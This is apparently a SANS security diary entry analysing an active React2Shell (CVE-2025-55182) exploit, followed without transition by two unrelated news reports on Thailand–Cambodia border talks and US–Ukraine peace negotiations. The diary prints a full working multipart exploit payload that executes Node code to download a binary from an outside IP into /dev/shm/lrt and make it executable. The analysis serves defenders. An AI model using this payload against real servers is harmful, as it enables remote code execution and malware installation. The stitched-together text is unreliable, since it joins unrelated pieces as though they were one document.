Category: Uncategorized

Exploits for React2Shell (CVE-2025-55182) remain active. However, at this point, I would think that any servers vulnerable to the “plain” exploit attempts have already been exploited several times. Here is today’s most popular exploit payload:

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',r=>r.pipe(process.mainModule.require('fs').createWriteStream('/dev/shm/lrt').on('finish',()=>process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));","_formData":{"get":"$1:constructor:constructor"}}}

------WebKitFormBoundaryxtherespoopalloverme

Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryxtherespoopalloverme

------WebKitFormBoundaryxtherespoopalloverme--

To make the key components more readable:

process.mainModule.require('http').get('http://51.81.104.115/nuts/poop',

r=>r.pipe(process.mainModule.require('fs').

createWriteStream('/dev/shm/lrt').on('finish'

This statement downloads the binary from 51.81.104.115 into a local file, /dev/shm/lrt.

process.mainModule.require('fs').chmodSync('/dev/shm/lrt',0o755))));

And then the script is marked as executable. It is unclear whether the script is explicitly executed. The Virustotal summary is somewhat ambiguous regarding the binary, identifying it as either adware or a miner [1]. Currently, this is the most common exploit variant we see for react2shell. 

Other versions of the exploit use /dev/lrt and /tmp/lrt instead of /dev/shm/lrt to store the malware.

/dev/shm and /dev/tmp are typically world writable and should always work. /dev requires root privileges, and these days it is unlikely for a web application to run as root. One recommendation to harden Linux systems is to create/tmp as its own partition and mark it as “noexec” to prevent it from being used as a scratch space to run exploit code. But this is sometimes tough to implement with “normal” processes running code in /tmp (not pretty, but done ever so often)

[1] https://www.virustotal.com/gui/file/895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b/detection

—

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Twitter|

South East Asia’s top diplomats met on Monday in Malaysia in a bid to end deadly border clashes between Thailand and Cambodia that have killed at least 41 people and displaced close to one million others.

They were seeking to revive a ceasefire that was brokered in July by Malaysia as chair of the Association of Southeast Asian Nations (Asean) and US President Donald Trump in July.

This was the first meeting between officials of Thailand and Cambodia since fighting resumed on 8 December. Both countries have blamed each other for the fresh hostilities.

The conflict dates back more than a century, when the borders of the two nations were drawn after the French occupation of Cambodia.

In his opening remarks, Malaysia’s foreign minister asked both sides and other Asean members to give the matter “our most urgent attention”.

“We must consider the wider ramifications of the continued escalation of the situation for the people we serve,” Mohamad Hasan told his counterparts, according to news agency AFP.

The most recent fighting has seen the exchange of artillery fire along the 800km (500-mile) border. Thailand has also launched air strikes targetting Cambodian positions.

The conflict has been the worst between Asean member states since the association was founded in 1967. The failure to contain it represents a serious blow to the bloc’s credibility.

Malaysian Prime Minister Anwar Ibrahim, who presided over the signing of the July ceasefire alongside Trump, said he was “cautiously optimistic” about Monday’s meeting in Kuala Lumpur.

“Our duty is to present the facts, but more importantly, to press upon them that it is imperative for them to secure peace,” he said last week.

Cambodia has said that the talks aim to restore “peace, stability and good neighbourly relations”, adding that it would reaffirm its position that the disputes should be resolved through peaceful means.

Thailand, while calling the meeting an important opportunity, reiterated its conditions for negotiations, including a declaration of ceasefire from Cambodia first and a “genuine and sustained” ceasefire.

The US and China have also been attempting to mediate a new ceasefire.

US Secretary of State Marco Rubio, who had a phone call with his Thai counterpart on Thursday, said that he hoped a new ceasefire could be reached by Monday or Tuesday.

China’s special envoy for Asian affairs, Deng Xijun, visited Phnom Penh last week. A statement from Beijing said he reaffirmed that China would continue to play a constructive role in facilitating dialogue between Cambodia and Thailand.

Additional reporting by BBC’s South East Asia Correspondent Jonathan Head

US and Ukrainian envoys say “productive and constructive” talks have taken place in Miami, but there still appears to be no major breakthrough in efforts to end Ukraine’s war with Russia.

Donald Trump’s special envoy, Steve Witkoff, issued a joint statement with the top Ukrainian negotiator, Rustem Umerov, after three days of meetings with European allies.

The pair said the meeting focused on aligning positions on a 20-point plan, a “multilateral security guarantee framework”, a “US Security guarantee framework for Ukraine” and an “economic & prosperity plan”.

Separate talks have been taking place in Miami between the US and the Russian envoy, Kirill Dmitriev.

“Our shared priority is to stop the killing, ensure guaranteed security, and create conditions for Ukraine’s recovery, stability, and long-term prosperity,” Witkoff and Umerov said in a statement.

The meetings are the latest step in weeks of diplomatic activity, sparked by the leaking of a 28-point US peace plan which shocked Ukraine and its European allies for appearing to favour Russia, which launched a full-scale invasion of Ukraine nearly four years ago.

Witkoff said representatives from Russia had met himself and other US officials in southern Florida, including Trump’s son-in-law Jared Kushner.

Witkoff said the meetings with Russian envoy Dmitriev were also “productive and constructive” and that “Russia remains fully committed to achieving peace in Ukraine”.

Trump has been pushing Ukraine and Russia to come to an agreement on ending the war, but so far the two countries have been unable to agree on major issues, including Moscow’s demand to keep land it has already seized.

US intelligence reports continue to warn that Russian President Vladimir Putin still wants to capture all of Ukraine and reclaim parts of Europe that belonged to the former Soviet empire, six sources familiar with US intelligence told the Reuters news agency.

This comes says after Putin told the BBC’s Steve Rosenberg that there will be no more wars after Ukraine, if Russia is treated with respect.

“There won’t be any operations if you treat us with respect, if you respect our interests just as we’ve always tried to respect yours,” he said.

Meanwhile, a Ukrainian drone attack damaged two vessels and two piers in Russia’s southern Krasnodar region, Russian officials said on Monday.

The damage led to a big fire, but Russian authorities say all crew were safely evacuated. Some reports say oil infrastructure was targeted.